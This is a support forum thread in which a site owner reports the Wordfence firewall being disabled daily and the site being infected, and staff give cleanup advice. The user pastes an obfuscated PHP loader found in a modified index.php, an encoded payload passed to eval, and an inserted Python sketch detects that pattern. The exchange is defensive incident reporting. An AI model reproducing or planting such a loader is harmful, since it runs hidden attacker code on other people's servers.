Support » Plugin: Wordfence Security - Firewall & Malware Scan » Wordfence Firewall getting disabled everyday

  • Resolved sonicplumber

    (@sonicplumber)


    I have configured Wordfence firewall on my website with Wordfence extended protection enabled.
    However, every day when I log in to the WordPress admin it asks me to configure this firewall again; it seems to not save the setting when the date changes somehow. It remains active for the whole day once enabled, but gets disabled again the next day.
    Ran the Scan and the following message appears at the end in the logs even though no threats are found.
    [Feb 01 16:15:12] Notice: Undefined index: version in /home/u367504499/domains/sonicplumber.com/public_html/wp-content/plugins/wordfence/lib/wfScanEngine.php on line 1696 Notice: Undefined index: version in /home/u367504499/domains/sonicplumber.com/public_html/wp-content/plugins/wordfence/lib/wfScanEngine.php on line 1716

    Please advise how to fix this.

Viewing 3 replies - 1 through 3 (of 3 total)
  • Plugin Support wfpeter

    (@wfpeter)

    Hi @sonicplumber, thanks for getting in touch.

    Firstly, the ‘version’ notice is related to Wordfence scanning the wordpress.org repository to check that your installed plugins/themes haven’t been modified from the official versions. I’ve seen this before where the developer has mistakenly not included a version number with their release. You can disable all plugins except for Wordfence and enable them one-by-one to see when this issue reoccurs. You could then drop the appropriate developer a message to let them know that this was an issue. As it’s not a fatal error, your site (and Wordfence) can still function under this condition.

    As for the disabling of Wordfence’s firewall every day, it sounds like it’s regular enough to potentially be a cron job on your server that is actively seeking out Wordfence and/or other plugins and disabling it deliberately.

    Some hosts in the past have been known to disallow Wordfence, and whilst we try to work closely with hosts to explain why millions of customers use it as part of their WordPress security solutions, some do not change their stance on this. I’m wondering if that’s the case here due to the regularity.

    Can you send a diagnostic report to wftest @ wordfence . com? You can find the link to do so at the top of the Wordfence Tools > Diagnostics page. Then click on “Send Report by Email”. Please add your forum username where indicated and respond here after you have sent it.

    Note: For the fastest response time, please make sure and add any information or questions directly to this topic and not the email address above unless asked.

    Thanks,

    Peter.

    Thread Starter sonicplumber

    (@sonicplumber)

    I have sent the diagnostic report as requested by you.
    Also, again the firewall got disabled today and my site was infected with malware.
    During the scan run after finding my firewall disabled, it reported the following errors.
    Critical Problems:

    * File appears to be malicious or unsafe: wp-options.php

    * File appears to be malicious or unsafe: smtphec.php

    * File appears to be malicious or unsafe: index.php

    * File appears to be malicious or unsafe: indeeex.php

    * File appears to be malicious or unsafe: wp-activate.php

    * File appears to be malicious or unsafe: wp-includes/SimplePie/wp-logs.php

    High Severity Problems:

    * WordPress core file modified: index.php

    * WordPress core file modified: wp-activate.php

    Once I repair / delete the infected files, the site no longer works.

    If I view the modified index.php file, I see the following code

    <?php
    $UeXploiT = "Sy1LzNFQKyzNL7G2V0svsYYw9YpLiuKL8ksMjTXSqzLz0nISS1K\x42rNK85Pz\x63gqLU4mLq\x43\x43\x63lFqe\x61m\x63Snp\x43\x62np6Rq\x41O0sSi3TUHHMM8iLN64IyMnPDEkN0kQ\x431g\x41\x3d";
    eval(htmlspecialchars_decode(gzinflate(base64_decode($UeXploiT))));
    exit;
    ?>

    Please advise
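
A triage sketch for the loader shape in the index.php quoted above: `eval` wrapped around `htmlspecialchars_decode`, `gzinflate` and `base64_decode`, fed by a long literal containing `\x` escapes. This is an added example, not part of the original posts and not Wordfence's scanner logic; the function names, the decoder list, the 120-character threshold and the sample strings are assumptions constructed for illustration.

```python
import re
from pathlib import Path

# Decoder functions commonly chained inside eval() by packed PHP loaders;
# the first three are the ones used in the index.php quoted above.
DECODERS = ("base64_decode", "gzinflate", "htmlspecialchars_decode",
            "gzuncompress", "str_rot13", "strrev")
EVAL_CALL = re.compile(r"\beval\s*\(", re.I)
DECODER_CALL = re.compile(r"\b(" + "|".join(DECODERS) + r")\s*\(", re.I)
HEX_ESCAPE = re.compile(r"\\x[0-9a-fA-F]{2}")
LONG_LITERAL = re.compile(r"""(["'])([A-Za-z0-9+/=\\]{120,})\1""")


def triage_php(source: str) -> list[str]:
    """Return the reasons a PHP source string looks like a packed loader."""
    reasons = []
    for m in EVAL_CALL.finditer(source):
        # Inspect only the statement that starts at this eval( call.
        stmt = source[m.end():].split(";", 1)[0]
        chain = [d.lower() for d in DECODER_CALL.findall(stmt)]
        if len(chain) >= 2:
            reasons.append("eval of decoder chain: " + " > ".join(chain))
    for m in LONG_LITERAL.finditer(source):
        if HEX_ESCAPE.search(m.group(2)):
            reasons.append(f"{len(m.group(2))}-char encoded literal with \\x escapes")
    return reasons


def scan_tree(root: str) -> dict[str, list[str]]:
    """Triage every .php file under root; map path -> reasons (hits only)."""
    hits = {}
    for path in Path(root).rglob("*.php"):
        reasons = triage_php(path.read_text(errors="replace"))
        if reasons:
            hits[str(path)] = reasons
    return hits


# Constructed samples: a benign stand-in with the same shape as the posted
# loader (the payload is just repeated filler), and a stock-style index.php.
PACKED = ('<?php\n$blob = "' + "QUJD\\x41" * 30 + '";\n'
          "eval(htmlspecialchars_decode(gzinflate(base64_decode($blob))));\nexit;\n")
CLEAN = "<?php\ndefine('WP_USE_THEMES', true);\nrequire __DIR__ . '/wp-blog-header.php';\n"

if __name__ == "__main__":
    print(triage_php(PACKED))
    print(triage_php(CLEAN))
```

A hit is a lead for manual review rather than a verdict; `scan_tree()` takes the site root and returns only the files that matched.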

    Plugin Support wfpeter

    (@wfpeter)

    Hi @sonicplumber, thanks for sending your diagnostics over and reporting back on the issue still occurring.

    I cannot see a clear reason why Wordfence is being consistently disabled like this, but that may be down to cron naming or something not easily searchable. I would take the following actions, especially now there seems to be a compromised set of files on your website.

    Follow the checklist here:
    https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/
    Make sure and get all your plugins and themes updated and update WordPress core too. If you are on an older branch (WordPress 4.x etc.) because you wanted to wait before installing the latest version because of Gutenberg or a custom theme compatibility, you still need the latest update in that version. Those can be found here:
    https://wordpress.org/download/releases/
    WordPress sometimes patches their older releases if they find a vulnerability so make sure to update your version if needed. We, of course, recommend that you update to the latest version.

    As a rule, any time I think someone’s site has been compromised I also tell them to update their passwords for their hosting control panel, FTP, WordPress admin users, and database. Make sure and do this.

    Additionally you might find the WordPress Malware Removal section in our free Learning Center helpful.

    If you are unable to clean this on your own there are paid services that will do it for you. Wordfence offers one and there are others. Regardless if you choose to clean it yourself or let someone else do so, we recommend that you make a full backup of the site beforehand.

    Let me know how you get on!

    Peter.

  • The topic ‘Wordfence Firewall getting disabled everyday’ is closed to new replies.